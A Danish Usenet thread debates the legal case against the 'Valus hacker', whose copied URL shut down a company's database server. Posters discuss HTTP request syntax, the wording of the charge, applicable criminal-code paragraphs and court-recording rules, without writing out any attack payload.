---

Valus-Hackeren har været til et retsmøde:

http://cubus-adsl.dk/elteknik/div/valushacker_retsmoede.php

Til Jura:

Hvad i alverden skulle jeg bruge en forsvarer til i denne "sag"?
(Dommeren påstår, at jeg nu, imod min vilje, skal have en
forsvarer, som jeg oven i købet selv skal betale).

Forudsigelserne i denne gruppe omkring ovenstående retsmøde
viste sig at holde fint stik. Så jeg spørger igen: forløbet af næste
akt i forestillingen? (retsmøde med dommer og to domsmænd).

Til Sikkerhed:

Tilsyneladende er der ikke tale om tastefejl i anklageskriftet mht
den såkaldte "kommando": get/publisering/... Hvad kan der siges
af kloge ord omkring GET, POST osv, som forekommer i en
servers logfil og som anklageren øjensynligt tror er udtryk for
kommandoer. Tilsyneladende tror vedkommende også, at der
har været skrevet get/publisering/..

--
Cubus
http://cubus-adsl.dk/

---

Cubus wrote:
>
> Tilsyneladende er der ikke tale om tastefejl i anklageskriftet mht
> den såkaldte "kommando": get/publisering/... Hvad kan der siges
> af kloge ord omkring GET, POST osv, som forekommer i en
> servers logfil og som anklageren øjensynligt tror er udtryk for
> kommandoer. Tilsyneladende tror vedkommende også, at der
> har været skrevet get/publisering/..

De relevante RFC'er er 1945 og 2616. Som definterer hhv.
HTTP/1.0 og HTTP/1.1

http://rfc.sunsite.dk/rfc/rfc1945.html
http://rfc.sunsite.dk/rfc/rfc2616.html

Jeg kan ikke lige finde HTTP/0.9 (men der er højst 1944
et kigge igennem).

Det der står i sigtelsen ligner mest en HTTP/0.9 request,
men mig bekendt bruger Internet Explorer enten HTTP/1.0
eller HTTP/1.1.

Når du skriver en URL ind i din browser vil den blive
opdelt i protokolnavn, hostnavn, og URI. Hostnavnet bliver
slået op (normalt vha. DNS), og browseren bygger en request,
som sendes til serveren.

Request består af en request line og et antal headers.
En HTTP/0.9 request kan kendes ved, at der ikke er et
versionsnummer i request linien. I det tilfælde består
requesten udelukkende af en metode, et mellemrum, en URI,
og et linieskift.

En HTTP/1.0 eller HTTP/1.1 request består af en request
linie og et antal headers, og en tom linie til at indikere
afslutning af requesten. Request linien består i dette
tilfælde af en metode, et mellemrum, en URI, et mellemrum,
og et linieskift.

Ifølge Gyldendals Røde Ordbøger kan request oversættes med
anmodning men det kan ikke oversættes med kommando.


Ordet GET er en metode, som din browser sætter ind føre
URIen. Og jeg tror roligt vi kan gå ud fra, at din browser
har lavet en korrekt formateret requestlinie og ikke de
mellemrumsfejl, som står i sigtelsen.

Og hvis ikke det er en ekstremt gammel browser, så kan vi
også forvente, at den har indsat en HOST header hvor
servernavnet www.valus.dk er fremgået. For mange servere
vil slet ikke kunne servere den rigtige side uden den
header.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

In <mv1wc.3257$wb.2460@news.get2net.dk> "Cubus" <cubus@sol.dk> writes:

>Valus-Hackeren har været til et retsmøde:

>http://cubus-adsl.dk/elteknik/div/valushacker_retsmoede.php

>den såkaldte "kommando": get/publisering/... Hvad kan der siges
>af kloge ord omkring GET, POST osv, som forekommer i en
>servers logfil og som anklageren øjensynligt tror er udtryk for
>kommandoer. Tilsyneladende tror vedkommende også, at der
>har været skrevet get/publisering/..

Vel, anklageskiftet har da ret. Din browser har sendt en kommando til
webserver og denne kommando var netop "GET /publisering/default.asp?..."

Mvh
Martin

---

"Martin Moller Pedersen" <tusk@daimi.au.dk> skrev i en meddelelse
news:c9qo6n$oo3$1@news.net.uni-c.dk...
> In <mv1wc.3257$wb.2460@news.get2net.dk> "Cubus" <cubus@sol.dk> writes:
>
> >Valus-Hackeren har været til et retsmøde:
>
> >http://cubus-adsl.dk/elteknik/div/valushacker_retsmoede.php
>
> >den såkaldte "kommando": get/publisering/... Hvad kan der siges
> >af kloge ord omkring GET, POST osv, som forekommer i en
> >servers logfil og som anklageren øjensynligt tror er udtryk for
> >kommandoer. Tilsyneladende tror vedkommende også, at der
> >har været skrevet get/publisering/..
>
> Vel, anklageskiftet har da ret. Din browser har sendt en kommando til
> webserver og denne kommando var netop >
> Mvh
> Martin
>
>

Undskyld min naivitet, men virker denne kommando "GET
/publisering/default.asp?...'plus lidt'" ?

Steffen
--
Artist Steffen Martin, odense, denmark
www.steffenmartin.dk

---

steffen martin wrote:
>
> Undskyld min naivitet, men virker denne kommando "GET
> /publisering/default.asp?...'plus lidt'" ?

Det er ikke en kommando, det er en request (anmodning hvis
vi skal oversætte det til dansk). Der skal være et mellemrum
efter GET for at den virker. Den der stod i sigtelsen ville
ikke have virket fordi de havde sat mellemrummet et forkert
sted.

Men bortset fra et par småfejl i sigtelsen, så virkede den
de første to gange, den blev brugt. Derefter lukkede de
hullet.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" <wfbtxutyalwrmiandynpenajcf@skrammel.yaboo.dk> skrev

> > Undskyld min naivitet, men virker denne kommando "GET
> > /publisering/default.asp?...'plus lidt'" ?
>
> Det er ikke en kommando, det er en request (anmodning hvis
> vi skal oversætte det til dansk). Der skal være et mellemrum
> efter GET for at den virker. Den der stod i sigtelsen ville
> ikke have virket fordi de havde sat mellemrummet et forkert
> sted.
>
> Men bortset fra et par småfejl i sigtelsen, så virkede den
> de første to gange, den blev brugt. Derefter lukkede de
> hullet.

Det har været fremme, at man også kunne have slettet indholdet
i databaserne, hvilket sikkert er rigtigt. Kunne man også have
overført pengebeløb mellem konti, hvis man havde forstand
på disse tekststrenge?

--
Cubus
http://cubus-adsl.dk/

---

Cubus skrev:

>Det har været fremme, at man også kunne have slettet indholdet
>i databaserne, hvilket sikkert er rigtigt. Kunne man også have
>overført pengebeløb mellem konti, hvis man havde forstand
>på disse tekststrenge?

Hvis der var fuld adgang til databasen, var der ingen grænser for
hvad man kunne have lavet - medmindre der var kryptiske symboler
og data hvis betydning man ikke kunne gætte.

Men man kan godt lave adgang på forskellige niveauer. Jeg har
f.eks. arbejdet i et firma hvor jeg havde ret udstrakt adgang til
deres database - jeg kunne gøre med alle data hvad jeg ville, men
jeg kunne hverken oprette eller nedlægge tabeller.

Jeg ved ikke om adgang til "shutdown" beviser at der er fuld
adgang, men det antyder det i hvert fald.

Men uanset ville man sandsynligvis kunne lave kaos i hele
databasen med enkle midler.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

In <l933c0hcqt4nu4nrrsob29do6cm2n9glrb@news.stofanet.dk> Bertel Lund Hansen <nospamius@lundhansen.dk> writes:

>Cubus skrev:

>Jeg ved ikke om adgang til "shutdown" beviser at der er fuld
>adgang, men det antyder det i hvert fald.

Hvis det er en oracle-database, saa var der fuld adgang.

/Martin

---

Cubus wrote:
>
> Det har været fremme, at man også kunne have slettet indholdet
> i databaserne, hvilket sikkert er rigtigt. Kunne man også have
> overført pengebeløb mellem konti, hvis man havde forstand
> på disse tekststrenge?

Da Valus blev meldt til Datatilsynet forklarede de, at
betalingssystemet og informationssystemet var adskilt,
så det ikke ville have kunnet lade sig gøre:

http://www.google.com/groups?threadm=qmnfb-3go.ln1%40miracle.mongers.org

Jeg ved ikke hvor meget Datatilsynet har gjort ud af at
undersøge korrektheden af de oplysninger Valus har
præsenteret.

Der er så vidt jeg har forstået ikke nogen tivl om, at
man tilgik begge systemer gennem den samme webserver.
Om der faktisk har været to uafhængige databaser bagved
tør jeg ikke udtale mig om. Jeg synes det lyder
usandsynligt, men det er tilsyneladende hvad Valus har
sagt til sit forsvar.

Hvis oplysningerne er rigtige har det ikke umiddelbart
været muligt at tilgå konti via det pågældende hul.

Man kunne forestille sig et mere sofistikeret angreb,
der først brugte hullet i informationssystemet til at
lægge noget javascript kode ind i nogle af dokumenterne,
som efterfølgende kunne afvikles i brugeres browsere,
hvor koden fordi den kommer fra samme webserver kan få
adgang til nogle af brugerens oplysninger.

Om dette angreb er realistisk kan jeg ikke sige med
sikkerhed. Jeg tror det ville være måligt hvis man er
tilpas målrettet.

Hvis oplysningerne modsat hvad Valus har forklaret
faktisk har ligget i samme database har det været
muligt at ændre på beløb på konti i systemet. Det skal
siges at jeg ikke selv kender databasen, men det er
hvad personer med mere kendskab til den pågældende
database har fortalt.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Cubus wrote:

> http://cubus-adsl.dk/elteknik/div/valushacker_retsmoede.php

Beskrivelsen lyder meget ordret. Har du optaget retsmødet på bånd?

--
Party time, excellent, wiuuuu, wiuuuu, wiuuuuuuu!!!

---

Christian Andersen wrote:

> Cubus wrote:
>
>
>>http://cubus-adsl.dk/elteknik/div/valushacker_retsmoede.php
>
>
> Beskrivelsen lyder meget ordret. Har du optaget retsmødet på bånd?

Uden at vide det: Jeg tror bare at VH er så pisse-sur over den sag at
han kan huske meget af hvad det handlede om og derefter er han gået hjem
og forfattet et referat, som han har opfattet mødet... Det kan man
sagtens, den slags - det har jeg selv prøvet et par gange... Det skal
nok nærmere opfattes som en "dagbog"...

Jeg glæder mig meget til at høre afgørelsen og på at læse hvad dommeren
siger til den sag!

mvh.
Martin Jørgensen

--
---------------------------------------------------------------------------
Home of Martin Jørgensen - http://www.martinjoergensen.dk

---

In <40c0e951$0$244$edfadb0f@dread12.news.tele.dk> =?ISO-8859-1?Q?Martin_J=F8rgensen?= <unoder.spam@spam.jay.net> writes:

>Jeg glæder mig meget til at høre afgørelsen og på at læse hvad dommeren
>siger til den sag!

Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.

/Martin

---

Martin Moller Pedersen wrote:
>>Jeg glæder mig meget til at høre afgørelsen og på at læse hvad dommeren
>>siger til den sag!
> Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.

Det er stadig fuldkommen tåbeligt... Der burde være en lov imod at
brokke sig hvis ens udueligt konstruerede website bliver hacket.

Hvis man bliver hacket pga. ganske kendte metoder eller fordi man
kører noget software med kendte huller i bør man IMHO holde sin kæft
og rette fejlen og evt. kalde det et 'nedbrud' .. under alle
omstændigheder bør man ikke gøre det Valus har gjort ;)

// Hans (og nu skal jeg vel høre på det dér med at egne meningen er
ligemeget, så jeg henviser til §1 i haj's lov.)
--
Hi! I'm a .signature virus!
Copy me into your ~/.signature to help me spread!

---

Martin Moller Pedersen wrote:
>
> Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.

Er den virkelig så oplagt? Selvfølgelig har han gjort
noget, han ikke burde have gjort. Men jeg mener bare
ikke den handling han har udført er det samme, som der
står i paragraf 263 stykke 2.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont skrev:

>> Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.

>Er den virkelig så oplagt? Selvfølgelig har han gjort
>noget, han ikke burde have gjort. Men jeg mener bare
>ikke den handling han har udført er det samme, som der
>står i paragraf 263 stykke 2.

Enig.

Han har ikke haft adgang til noget gemme (tværtimod lukkede han
faktisk adgangen totalt ned), og han har ikke *skaffet* noget,
men benyttet den adgang som Valus frivilligt og med vilje
stillede til rådighed.

Han har benyttet den på en måde der ikke var tiltænkt.
Spørgsmålet er hvilken paragraf man derved overtræder.

Jeg mener i øvrigt heller ikke det er nogen som helst enkel sag
at fastslå hvilken hensigt han havde - hvis det skulle være
akuelt i forhold til en anden, mere relevant paragraf.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen wrote:
>
> Jeg mener i øvrigt heller ikke det er nogen som helst enkel sag
> at fastslå hvilken hensigt han havde - hvis det skulle være
> akuelt i forhold til en anden, mere relevant paragraf.

Det lyder for mig mest som om han har haft til hensigt at
vise, at systemet ikke var så hullet som folk påstod.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

In <5c23c0ti4gbrf8na2oe7ddot2fle4pbnsv@news.stofanet.dk> Bertel Lund Hansen <nospamius@lundhansen.dk> writes:

>Kasper Dupont skrev:

>>> Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.

>>Er den virkelig så oplagt? Selvfølgelig har han gjort
>>noget, han ikke burde have gjort. Men jeg mener bare
>>ikke den handling han har udført er det samme, som der
>>står i paragraf 263 stykke 2.

>Enig.

>Han har ikke haft adgang til noget gemme (tværtimod lukkede han
>faktisk adgangen totalt ned), og han har ikke *skaffet* noget,
>men benyttet den adgang som Valus frivilligt og med vilje
>stillede til rådighed.

Med vilje ? Valus lavede en fejl og det var da ikke med vilje
at man kunne lave en shutdown.

/Martin

---

In article <c9ui7p$ub4$1@news.net.uni-c.dk>, Martin Moller Pedersen wrote:
> In <5c23c0ti4gbrf8na2oe7ddot2fle4pbnsv@news.stofanet.dk> Bertel Lund Hansen <nospamius@lundhansen.dk> writes:
>
>>Kasper Dupont skrev:
>
>>>> Jeg vil vaedde paa at hans bliver kendt skyldig. Sagen er oplagt.
>
>>>Er den virkelig så oplagt? Selvfølgelig har han gjort
>>>noget, han ikke burde have gjort. Men jeg mener bare
>>>ikke den handling han har udført er det samme, som der
>>>står i paragraf 263 stykke 2.
>
>>Enig.
>
>>Han har ikke haft adgang til noget gemme (tværtimod lukkede han
>>faktisk adgangen totalt ned), og han har ikke *skaffet* noget,
>>men benyttet den adgang som Valus frivilligt og med vilje
>>stillede til rådighed.
>
> Med vilje ? Valus lavede en fejl og det var da ikke med vilje
> at man kunne lave en shutdown.

Hvis Valus har opsat databasen således at web-klinter kører
som dbo (DataBase Owner) op mod databasen, så er det så dumt,
og imod alle anbefalinger i al litteratur om udvikling og
IT Sikkerheds / revisionsanbefalinger, at det det kun kan
være sket med vilje. Medmindre at de selvfølgelig på anden
vist har handlet groft uansvarlige med personoplysninger.

Jeg mener de burde gå efter den virksomhed der har lavet
et sikkerhedstjek af løsningen inden den gik i produktion,
da en så lemfældig omgang med persondata er ulovlig.

--
Povl H. Pedersen - NoSpam@my.terminal.dk (yes - it works)
Get 5% discount on VMWare use discount/referral code: MRC-POVPED260

---

> Jeg mener de burde gå efter den virksomhed der har lavet
> et sikkerhedstjek af løsningen inden den gik i produktion,
> da en så lemfældig omgang med persondata er ulovlig.

He he..... Netaxept er en af Norge førende leverandører af bl.a.
betalingsportaler... skræmmende, især når man til daglig arbejder sammen med
dem.

- Daniel

---

Povl H. Pedersen skrev:

>Jeg mener de burde gå efter [...]

Det er irrelevant i den aktuelle sag.

Jeg tror, uden at være sikker, at Valushackeren kan straffes (med
en lille straf) for det han har gjort, men jeg tror ikke han kan
straffes for det han p.t. er anklaget for.

Jeg kan i øvrigt ikke finde en paragraf i straffeloven som jeg
synes passer.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Martin Moller Pedersen wrote:
>
> In <5c23c0ti4gbrf8na2oe7ddot2fle4pbnsv@news.stofanet.dk> Bertel Lund Hansen <nospamius@lundhansen.dk> writes:
>
> >Han har ikke haft adgang til noget gemme (tværtimod lukkede han
> >faktisk adgangen totalt ned), og han har ikke *skaffet* noget,
> >men benyttet den adgang som Valus frivilligt og med vilje
> >stillede til rådighed.
>
> Med vilje ? Valus lavede en fejl og det var da ikke med vilje
> at man kunne lave en shutdown.

Nej, det var nok ikke med vilje, at adgangen kunne bruges
til at lukke databasen ned. Men det var med vilje at de
havde lavet adgang til databasen, for deres websider kunne
ikke bruges uden.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Martin Moller Pedersen skrev:

>>Han har ikke haft adgang til noget gemme (tværtimod lukkede han
>>faktisk adgangen totalt ned), og han har ikke *skaffet* noget,
>>men benyttet den adgang som Valus frivilligt og med vilje
>>stillede til rådighed.

>Med vilje ?

Ja, med vilje. Valus stillede med vilje systemet til rådighed.

>Valus lavede en fejl

.... som de med vilje stillede til offentlighedens rådighed.

At de ikke kendte konsekvenserne af deres fejl, er en anden sag.

>og det var da ikke med vilje at man kunne lave en shutdown.

Det vil jeg umiddelbart mene, men det er knap så indlysende. Jeg
vil sige at de med vilje lavede systemet så man kunne lave en
shutdown, men at det blot ikke var lavet med den hensigt.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

"Christian Andersen" <5oyh8a102@sneakemail.com> skrev i
news:c9qee0$bid$1@charybdis.vof.dk

> Beskrivelsen lyder meget ordret.
> Har du optaget retsmødet på bånd?

Ville det i øvrigt være lovligt for et anklaget i en straffesag
at optage et retsmøde på bånd uden at indhente accept fra
de øvrige "medvirkende"?

---

Peter wrote:

> Ville det i øvrigt være lovligt for et anklaget i en straffesag
> at optage et retsmøde på bånd uden at indhente accept fra
> de øvrige "medvirkende"?

Det er slet ikke lovligt uanset om han fik lov eller ej, hvilket han
ikke ville få, eftersom det er ulovligt.

--
Party time, excellent, wiuuuu, wiuuuu, wiuuuuuuu!!!

---

"Christian Andersen" <5oyh8a102@sneakemail.com> skrev i
news:ca1big$2jmv$1@charybdis.vof.dk

> > Ville det i øvrigt være lovligt for et anklaget i en straffesag
> > at optage et retsmøde på bånd uden at indhente accept fra
> > de øvrige "medvirkende"?

> Det er slet ikke lovligt uanset om han fik lov eller ej,
> hvilket han ikke ville få, eftersom det er ulovligt.

Jeg er nu faldet over retsplejelovens § 32, stk. 1, 1. pkt,
som jeg ikke var bekendt med tidligere:

"Det er forbudt under retsmøder at optage eller transmittere
billeder og lyd, medmindre retten undtagelsesvis tillader dette."

Så hvis dommeren tillod det, kunne Cubus lovligt optage på bånd.

---

Peter wrote:

> Jeg er nu faldet over retsplejelovens § 32, stk. 1, 1. pkt,
> som jeg ikke var bekendt med tidligere:

Det var jeg heller ikke. Tak for oplysningen!

> Så hvis dommeren tillod det, kunne Cubus lovligt optage på bånd.

Jep.

--
Party time, excellent, wiuuuu, wiuuuu, wiuuuuuuu!!!

---

Cubus wrote:

> Tilsyneladende er der ikke tale om tastefejl i anklageskriftet mht
> den såkaldte "kommando": get/publisering/... Hvad kan der siges
> af kloge ord omkring GET, POST osv, som forekommer i en
> servers logfil og som anklageren øjensynligt tror er udtryk for
> kommandoer. Tilsyneladende tror vedkommende også, at der
> har været skrevet get/publisering/..

For det første er HTTP request ikke kommandoer. SHUTDOWN er dog en kommando.

Det er usandsynligt at din browser har sendt en request der starter med
"get/publisering/", da det er en fejlagtig request. Browseren har nok
snarere sendt noget i retning af "GET /publicering/", hvor GET er stavet
med stort og der er mellemrum efter GET.

Uden mellemrummet ville requesten kun resultere i en fejl. Det er
usandsynligt at din browser har sendt en sådan fejlagtigt request.
Desuden vil fejlagtig request blot blive behandlet som en fejl og
SHUTDOWN vil ikke blive sendt videre til databasen. Hvis det er deres
bevis, kan sagen måske afvises pga. fejlagtige beviser eller lignende?
(jeg er ikke jurist).

---

No1 skrev:

>SHUTDOWN vil ikke blive sendt videre til databasen. Hvis det er deres
>bevis, kan sagen måske afvises pga. fejlagtige beviser eller lignende?
>(jeg er ikke jurist).

Så vidt jeg kan vurdere (heller ikke jurist) vil det primære
forsvar være at den paragraf han er anklaget for at overtræde,
slet ikke er blevet overtrådt.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

No1 wrote:

> Uden mellemrummet ville requesten kun resultere i en fejl. Det er
> usandsynligt at din browser har sendt en sådan fejlagtigt request.

Det er en skrivefejl i anklageskriftet. Der er ingen tvivl om, at Cubus
har lagt serveren ned ved at sende en request/kommando til serveren.

> Hvis det er deres
> bevis, kan sagen måske afvises pga. fejlagtige beviser eller lignende?
> (jeg er ikke jurist).

Jeg er sikker på, at et manglende mellemrum i et anklageskrift ikke er
nok til at få afvist en sag. Beviset fejler vist ikke noget (log-fil med
Cubus' ip-nummer og de sendte requests/kommandoer).

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Beviset fejler vist ikke noget (log-fil med
> Cubus' ip-nummer og de sendte requests/kommandoer).

Hvis man da anerkender en log-fil, der i teorien kunne
være falsk, som bevismateriale. Men det er nok irrelevant,
når Cubus allerede har tilstået at han kopierede URLen
fra indlæget.

Normalt ville jeg ikke hænge mig så meget i om man kaldte
det requests eller kommandoer. Men i et anklageskrift kan
man altså ikke være så lemfældig med detaljerne.

Så enten er sigtelsen skrevet af en person, der ikke ved,
hvad h[au]n taler om eller også er det et bevidst forsøg
på at få handlingen til at lyde værre end den reelt var.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" <wfbtxutyalwrmiandynpenajcf@skrammel.yaboo.dk> skrev

> Så enten er sigtelsen skrevet af en person, der ikke ved,
> hvad h[au]n taler om eller også er det et bevidst forsøg
> på at få handlingen til at lyde værre end den reelt var.

Efter at have mødt anklageren må jeg sige at begge dele
nok er tilfældet. Det var mit klare indtryk, at sigtelsen var
skrevet af anklageren. Hun gav udtryk for, at hun nu ville
bruge præcis den samme tekst i det som nu kaldes et
anklageskrift.

--
Cubus
http://cubus-adsl.dk/

---

Cubus wrote:
>
> "Kasper Dupont" <wfbtxutyalwrmiandynpenajcf@skrammel.yaboo.dk> skrev
>
> > Så enten er sigtelsen skrevet af en person, der ikke ved,
> > hvad h[au]n taler om eller også er det et bevidst forsøg
> > på at få handlingen til at lyde værre end den reelt var.
>
> Efter at have mødt anklageren må jeg sige at begge dele
> nok er tilfældet. Det var mit klare indtryk, at sigtelsen var
> skrevet af anklageren. Hun gav udtryk for, at hun nu ville
> bruge præcis den samme tekst i det som nu kaldes et
> anklageskrift.

Jeg må hellere lige slå fast, at *jeg* ved ikke hvad
forskellen er på en sigtelse og et anklageskrift.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont wrote:
>
> Normalt ville jeg ikke hænge mig så meget i om man kaldte
> det requests eller kommandoer. Men i et anklageskrift kan
> man altså ikke være så lemfældig med detaljerne.

Måske der også er forskel på, hvad man i edb-verdenen kalder en
kommando, og hvad man andre steder kalder en kommando. Jeg mener i hvert
fald, at det godt kan forsvares at kalde det at sende en kommando, idet
man beder serveren om at udføre en bestemt handling. Men måske den
diskussion hører mere hjemme i sproggruppen.

Noget helt andet er så, om man har valgt en forkert paragrat eller ej.
Vi nærmer os her en anden diskussion i juragruppen, om hvad der ligger i
ordet uberettiget (Fildeling på LAN).

Måske man skulle skele til, hvordan sagen mod en af de andre, der
kopierede den pågældende URL endte:
http://www.computerworld.dk/default.asp?Mode=2&ArticleID=16916.
Det skal dog bemærkes, at sagerne ikke er helt ens. I den afgjorte sag
lykkedes det ikke at lukke serveren, fordi Cubus kom ham i forkøbet, til
gengæld forsøgte han sig også med Computerworld Onlines server, hvor han
slettede et brugerkartotek efter at have gættet på tabelnavne i en
database. Artiklen skriver desværre ikke, hvilken paragraf, han blev
dømt efter, men mon ikke anklageren har benyttet den samme paragraf til
de to sager.

--
Mvh. Kim Ludvigsen

---

"Kim Ludvigsen" <usenet@kimludvigsen.dk> skrev

> Måske man skulle skele til, hvordan sagen mod en af de andre, der
> kopierede den pågældende URL endte:
> http://www.computerworld.dk/default.asp?Mode=2&ArticleID=16916.
> Det skal dog bemærkes, at sagerne ikke er helt ens. I den afgjorte sag
> lykkedes det ikke at lukke serveren, fordi Cubus kom ham i forkøbet, til
> gengæld forsøgte han sig også med Computerworld Onlines server, hvor han
> slettede et brugerkartotek efter at have gættet på tabelnavne i en
> database. Artiklen skriver desværre ikke, hvilken paragraf, han blev
> dømt efter, men mon ikke anklageren har benyttet den samme paragraf til
> de to sager.

Artiklen giver indtryk af en person der helt og holdent har sagt ja og
amen til anklagerens postulater. Det kan man vel ikke bruge til så meget.

Hvad nu hvis jeg havde strøget anklageren med hårene til retsmødet.
Havde dommeren så måttet træde i karakter og udtale en straf, eller
hvad var der sket? Dvs, hvis jeg havde udtalt mig enig i hændelserne
i den oplæste sigtelse.

--
Cubus
http://cubus-adsl.dk/

---

Cubus wrote:
>
> Hvad nu hvis jeg havde strøget anklageren med hårene til retsmødet.
> Havde dommeren så måttet træde i karakter og udtale en straf, eller
> hvad var der sket?

Det er derfor, du skal have en forsvarer. Han vil kunne sige: "Min
klient erkender at have foretaget den pågældende handling, men...". Og
så evt. argumentere for, at handlingen ikke falder ind under den nævnte
paragraf, eller hvad han nu ellers kan finde af argumenter for, at du
ikke skal straffes.

> Dvs, hvis jeg havde udtalt mig enig i hændelserne i den oplæste sigtelse.

Du erkender jo, at du har foretaget den handling, der førte til, at
serveren gik ned. Jeg tror, dommeren vil holde sig til sagens substans
og ikke lægge særlig megen vægt på en tvist om brugen af ordet
"kommando" eller et manglende mellemrun i anklageskriftet, men jeg er
ikke jurist, så måske jeg tager fejl.

FUT: news:dk.videnskab.jura, da denne del af tråden ikke har meget med
sikkerhed at gøre.

--
Mvh. Kim Ludvigsen



--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Du erkender jo, at du har foretaget den handling,

Korrekt.

> der førte til, at serveren gik ned.

Serveren gik ikke ned, serveren lukkede ned. Tvivler
dog på at det gør nogen forskel.

> Jeg tror, dommeren vil holde sig til sagens substans
> og ikke lægge særlig megen vægt på en tvist om brugen af ordet
> "kommando" eller et manglende mellemrun i anklageskriftet,

Jeg er enig i, at det manglende mellemrum ikke burde
have nogen betydning, hvis ellers anklageren blot
erkender, at de har lavet en mindre fejl og retter
deres anklage på det punkt.

Men brugen af ordet kommando antyder noget usandt om
hændelsesforløbet.

> men jeg er ikke jurist, så måske jeg tager fejl.

Det er jeg heller ikke, men jeg vil så lige benytte
lejligheden til at stille et spørgsmål til nogen, der
forhåbentlig ved lidt mere.

Kan man forvente at anklageren retter fejlene. Og hvad
betydning vil det få, hvis anklageren kommer med en
revideret udgave?

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" <wfbtxutyalwrmiandynpenajcf@skrammel.yaboo.dk> skrev i en
meddelelse news:40C1DEBF.6BB2A7EE@skrammel.yaboo.dk...
>...snip...snap....
>
> Men brugen af ordet kommando antyder noget usandt om
> hændelsesforløbet.

Den rigtige betegnelse må vel være en forespørgsel (HTTP Request).

Det er jo en anmodning som sendes til serveren, hvor dens database modtager
anmodningen (forespørgslen) om bearbejdning af databasen - f.eks. at hente
data (opslag) eller i dette tilfælde nedlukning.

Det ligner ordkløverri, men jeg kunne have på fornemmelsen at det ikke er
helt ligegyldigt om det er en kommando eller forespørgsel.

Til sammenligning vil jeg kalde det som Blaster, Code Red osv. udfører for
en kommando, selvom det sker på tilnærmelsesvis samme måde som ved Valus.dk

Blaster og Valus metoderne er der teknisk meget stor forskel på.

>
> > men jeg er ikke jurist, så måske jeg tager fejl.
>
> Det er jeg heller ikke, men jeg vil så lige benytte
.....og her er så atter en tekniker som heller ikke er jurist.

--
MVH Anders (8900)
Det er fordi det er nemmere at læse - vi læser jo ikke nedfra og op.
Hvorfor skal man skrve svaret under det man svarer ?

---

"Anders Larsson (fjern ikke noget fra email adr.)" wrote:
>
> Den rigtige betegnelse må vel være en forespørgsel (HTTP Request).

Det kunne jeg også finde på at kalde det. Men den
oversættelse findes ikke i min ordbog.

>
> Det er jo en anmodning som sendes til serveren, hvor dens database modtager
> anmodningen (forespørgslen) om bearbejdning af databasen - f.eks. at hente
> data (opslag) eller i dette tilfælde nedlukning.

Vi skal ikke blande de to ting sammen. Der sendes først
en request til webserveren. Derpå starter webserveren et
script, der kommunikerer med databaseserveren. Det er
databaseserveren, der lukker ned pga. kommunikationen
med scriptet. Webserveren kører upåvirket videre.

I anklagen nævnes kun kommunikationen mellem klienten og
webserveren. Og nu hvor jeg læser den igen opdager jeg
endnu en fejl. Udfra formuleringen i anklagen lyder det
som om det var webserveren, der blev lukket ned. Det er
ikke sandt. Webserveren kørte videre, det var databaseserveren
der blev lukket ned.

Godt nok står der intet i anklagen om, hvad det er for
en server. Men jeg synes helt klart anklagen antyder, at
det er den server Cubus kommunikerede med, der lukkede
ned. Intet i anklagen angiver, at der er to forskellige
servere.

(Læs evt. selv efter og se om ikke min tolkning er korrekt:
http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php)

>
> Det ligner ordkløverri, men jeg kunne have på fornemmelsen at det ikke er
> helt ligegyldigt om det er en kommando eller forespørgsel.

Det er et tolkningsspørgsmål. Men der er en forskel på
betydningen af de to ord. Normalt bruges ordet kommando,
når man har den fulde kontrol med softwaren, altså hvis
jeg kan give kommandoer til et program, så er det mig
der bestemmer og programmet adlyder. Med forespørgsler
(requests) er det anderledes, her spørger man pænt, og
det er op til programmet at beslutte, om det vil
efterkomme anmodningen.

Ved at bruge ordet kommando i stedet for request antydes
det altså, at Valus er helt uden skyld i problemet.

>
> Til sammenligning vil jeg kalde det som Blaster, Code Red osv. udfører for
> en kommando, selvom det sker på tilnærmelsesvis samme måde som ved Valus.dk
>
> Blaster og Valus metoderne er der teknisk meget stor forskel på.

Først siger du tilnærmelsesvis samme måde, og derpå
siger du teknisk meget stor forskel. Er du ved at
modsiger dig selv, eller er der en mening som blot er
svær at få øje på?

Den eneste lighed jeg kan få øje på er, at der i begge
tilfælde udnyttes et sikkerhedshul i softwaren. Men
der er stor forskel på, hvad det er for en slags hul,
og hvad det kan udnyttes til.

